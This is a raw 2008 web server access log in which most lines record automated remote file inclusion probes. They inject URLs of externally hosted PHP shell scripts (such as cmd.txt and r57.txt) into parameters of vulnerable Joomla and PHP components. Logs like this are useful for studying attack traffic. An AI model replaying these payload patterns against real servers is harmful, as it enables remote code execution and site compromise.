213.186.192.164 - - [29/Jul/2008:09:11:36 -0700] "GET //index.php?DOCUMENT_ROOT=http://beherit.interfree.it/cmd.txt?? HTTP/1.1" 200 18413 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.214.193 - - [29/Jul/2008:09:11:59 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.214.193 - - [29/Jul/2008:09:12:03 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18573 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:09:12:07 -0700] "GET /logs/access_080218.log//modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:09:12:07 -0700] "GET //modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [29/Jul/2008:09:12:07 -0700] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://moisidis.gr/siteframe/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:12:18 -0700] "GET /logs/access_080207.log//skin/zero_vote/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:12:33 -0700] "GET /logs/access_080207.log//skin/zero_vote/errors.php?error=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.150.22.141 - - [29/Jul/2008:09:12:34 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:09:12:43 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:09:12:44 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.40.4.49 - - [29/Jul/2008:09:12:54 -0700] "GET /logs/access_080124.log HTTP/1.1" 200 321536 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:12:56 -0700] "GET /logs/access_080103.log//skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:12:59 -0700] "GET //skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.240.22 - - [29/Jul/2008:09:13:00 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:13:03 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.75.240.22 - - [29/Jul/2008:09:13:04 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18581 "-" "libwww-perl/5.803" "www.dmulk.com"
205.234.198.225 - - [29/Jul/2008:09:13:06 -0700] "GET /logs/access.log%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://clubmusic.caucasus.net/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.244.71.72 - - [29/Jul/2008:09:13:09 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [29/Jul/2008:09:13:09 -0700] "GET ///vwar/backup/errors.php?error=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.244.71.72 - - [29/Jul/2008:09:13:10 -0700] "GET /logs///vwar/backup/errors.php?error=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:09:13:24 -0700] "GET /logs/access_080222.log/solpot.html?body=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:09:13:29 -0700] "GET /logs/access_080321.log/solpot.html?body=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.70.36.107 - - [29/Jul/2008:09:14:16 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [29/Jul/2008:09:14:19 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18589 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:09:14:22 -0700] "GET /logs/access.log/?sourcedir=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.120.213 - - [29/Jul/2008:09:14:33 -0700] "GET /logs//calendar.php?vwar_root=http://institut-tibetain.org/cms/modules/FormBuilder/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.120.213 - - [29/Jul/2008:09:14:33 -0700] "GET /logs/access_080215.log//calendar.php?vwar_root=http://institut-tibetain.org/cms/modules/FormBuilder/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.120.213 - - [29/Jul/2008:09:14:34 -0700] "GET //calendar.php?vwar_root=http://institut-tibetain.org/cms/modules/FormBuilder/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.97.201.148 - - [29/Jul/2008:09:14:40 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.97.201.148 - - [29/Jul/2008:09:14:40 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.97.201.148 - - [29/Jul/2008:09:14:46 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.205.120.213 - - [29/Jul/2008:09:14:49 -0700] "GET /logs/access_080215.log%20//calendar.php?vwar_root=http://institut-tibetain.org/cms/modules/FormBuilder/v6id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:09:15:03 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:09:15:03 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
69.64.48.146 - - [29/Jul/2008:09:15:07 -0700] "GET /logs/access.log/modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://purearcade.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.63.166.23 - - [29/Jul/2008:09:15:16 -0700] "GET /logs/access.log//404.php?DOCUMENT_ROOT=http://www.brazebo.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
66.63.166.23 - - [29/Jul/2008:09:15:16 -0700] "GET //404.php?DOCUMENT_ROOT=http://www.brazebo.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
66.63.166.23 - - [29/Jul/2008:09:15:16 -0700] "GET /logs//404.php?DOCUMENT_ROOT=http://www.brazebo.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.68" "www.dmulk.com"
62.149.205.38 - - [29/Jul/2008:09:15:27 -0700] "GET /logs/access.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.caffediperugia.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.205.38 - - [29/Jul/2008:09:15:27 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.caffediperugia.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.149.205.38 - - [29/Jul/2008:09:15:28 -0700] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://www.caffediperugia.it/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:15:28 -0700] "GET /logs/access_080207.log//skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:09:15:30 -0700] "GET /logs/access_080218.log/view.php?sub=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:09:15:30 -0700] "GET /view.php?sub=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:09:15:30 -0700] "GET /logs/view.php?sub=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:09:15:44 -0700] "GET /bikes/dteel/?N=A HTTP/1.0" 200 2739 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:15:50 -0700] "GET /logs/access_080103.log//skin/zero_vote/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:15:53 -0700] "GET //skin/zero_vote/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.73.181.56 - - [29/Jul/2008:09:15:56 -0700] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://legalref.ru/config/idscan.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
69.73.181.56 - - [29/Jul/2008:09:15:56 -0700] "GET //index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://legalref.ru/config/idscan.txt? HTTP/1.1" 200 3694 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:15:57 -0700] "GET /logs//skin/zero_vote/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:09:16:01 -0700] "GET /logs/scanhttp://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
207.210.115.114 - - [29/Jul/2008:09:16:04 -0700] "GET /scanhttp://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.32.28.161 - - [29/Jul/2008:09:16:05 -0700] "GET /logs/access_080218.log/cyberfolio/portfolio/msg/view.php?av=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.32.28.161 - - [29/Jul/2008:09:16:08 -0700] "GET /logs/cyberfolio/portfolio/msg/view.php?av=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
64.32.28.161 - - [29/Jul/2008:09:16:08 -0700] "GET /cyberfolio/portfolio/msg/view.php?av=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
88.86.110.83 - - [29/Jul/2008:09:16:11 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.86.110.83 - - [29/Jul/2008:09:16:11 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:16:12 -0700] "GET /logs/access_080103.log//skin/zero_vote/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.32.28.161 - - [29/Jul/2008:09:16:14 -0700] "GET /logs/access_080128.log/cyberfolio/portfolio/msg/view.php?av=http://tartufellinolol.altervista.org/piccino/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:16:15 -0700] "GET //skin/zero_vote/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:16:18 -0700] "GET /logs//skin/zero_vote/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:09:16:24 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_24/ HTTP/1.0" 200 14161 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:16:29 -0700] "GET /logs/access.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:16:29 -0700] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.243.169.10 - - [29/Jul/2008:09:16:30 -0700] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.33.1.189 - - [29/Jul/2008:09:16:57 -0700] "GET //join.php?DOCUMENT_ROOT=http://www.fallauna.com/coprald/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
84.33.1.189 - - [29/Jul/2008:09:16:57 -0700] "GET /logs//join.php?DOCUMENT_ROOT=http://www.fallauna.com/coprald/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:09:17:00 -0700] "GET /logs/scanhttp://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
70.84.182.98 - - [29/Jul/2008:09:17:00 -0700] "GET /scanhttp://growlibear.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
87.118.110.139 - - [29/Jul/2008:09:17:07 -0700] "GET /logs/access_071226.log/?mosConfig_live_site=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
194.79.75.195 - - [29/Jul/2008:09:17:10 -0700] "GET /logs/access_080129.log/%02administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.g8articles.com/update???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
194.79.75.195 - - [29/Jul/2008:09:17:11 -0700] "GET /%02administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.g8articles.com/update???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
88.86.110.83 - - [29/Jul/2008:09:17:29 -0700] "GET /logs/sub.php?s=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.86.110.83 - - [29/Jul/2008:09:17:29 -0700] "GET /sub.php?s=http://emark.sk/new/vnc/festidio.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.70.36.107 - - [29/Jul/2008:09:17:30 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.70.36.107 - - [29/Jul/2008:09:17:32 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.coronaclub.it/pk_gallery/photos/25/11828333/idilegal.txt??? HTTP/1.1" 200 18499 "-" "libwww-perl/5.805" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:17:32 -0700] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
89.97.0.11 - - [29/Jul/2008:09:17:50 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.mazcotaz.com/help/cmd.txt? HTTP/1.1" 200 18413 "-" "libwww-perl/5.803" "www.dmulk.com"
220.80.108.140 - - [29/Jul/2008:09:18:05 -0700] "GET /logs/access_080329.log//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.80.108.140 - - [29/Jul/2008:09:18:06 -0700] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
220.80.108.140 - - [29/Jul/2008:09:18:06 -0700] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://www.tramiche.org/l33tb1t.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
84.33.1.189 - - [29/Jul/2008:09:18:08 -0700] "GET /logs/index.php?page=http://www.fallauna.com/coprald/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
84.33.1.189 - - [29/Jul/2008:09:18:08 -0700] "GET /index.php?page=http://www.fallauna.com/coprald/test.txt?? HTTP/1.1" 200 18407 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.dmulk.com"
74.6.17.183 - - [29/Jul/2008:09:18:10 -0700] "GET /bikes/dteel/WeSTOC08/2008_06_28/ HTTP/1.0" 200 1025 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
87.230.35.101 - - [29/Jul/2008:09:18:13 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.35.101 - - [29/Jul/2008:09:18:16 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 200 18597 "-" "libwww-perl/5.803" "www.dmulk.com"
62.152.41.170 - - [29/Jul/2008:09:18:18 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://shopsb.ru/THIEF/kiss/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.141.56.49 - - [29/Jul/2008:09:18:19 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.141.56.49 - - [29/Jul/2008:09:18:21 -0700] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.ctocnet-socal.org/registration/id2.txt?? HTTP/1.1" 200 18519 "-" "libwww-perl/5.65" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:18:25 -0700] "GET /logs/access_080315.log/errors.php?error=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:18:26 -0700] "GET /logs/errors.php?error=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:18:34 -0700] "GET /logs/access_080207.log//skin/zero_vote/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:18:50 -0700] "GET /logs/access_080315.log/errors.php?error=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:18:51 -0700] "GET /logs/errors.php?error=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:18:51 -0700] "GET /logs/access_080207.log/errors.php?error=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
217.160.79.70 - - [29/Jul/2008:09:18:57 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://alohaclubhawaii.com/members/community/plugins/safehtml/poiid.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.79.70 - - [29/Jul/2008:09:19:04 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://alohaclubhawaii.com/members/community/plugins/safehtml/poiid.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.160.79.70 - - [29/Jul/2008:09:19:04 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://alohaclubhawaii.com/members/community/plugins/safehtml/poiid.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
194.79.75.195 - - [29/Jul/2008:09:19:06 -0700] "GET /logs/access.log/%02administrator/components/com_jcs/views/reports.html.php?mosConfig_absolute_path=http://www.g8articles.com/update???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
222.236.221.63 - - [29/Jul/2008:09:19:06 -0700] "GET /logs/access_080207.log//skin/zero_vote/errors.php?dir=http://russianinterpreter.ru/images/stories/idd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.97.201.148 - - [29/Jul/2008:09:19:10 -0700] "GET /logs/access_080330.log/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.doxgroup.com/egroupware/did.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.77.172 - - [29/Jul/2008:09:19:12 -0700] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 200 3694 "-" "libwww-perl/5.810" "www.dmulk.com"
216.120.241.242 - - [29/Jul/2008:09:19:14 -0700] "GET /logs/access_080207.log/errors.php?error=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:09:19:17 -0700] "GET /logs/access_080129.log/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:09:19:18 -0700] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.191.163 - - [29/Jul/2008:09:19:18 -0700] "GET /logs/administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=uid=10042(susanita)%20gid=2523(psacln)%20groups=16(dialout),33(video),2523(psacln)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.53.39.34 - - [29/Jul/2008:09:19:26 -0700] "GET /logs/access_080117.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.39.34 - - [29/Jul/2008:09:19:26 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.53.39.34 - - [29/Jul/2008:09:19:26 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.246.77.172 - - [29/Jul/2008:09:19:36 -0700] "GET /logs/access.log/index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://tsunamibot.t35.com/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
132.199.139.171 - - [29/Jul/2008:09:19:36 -0700] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
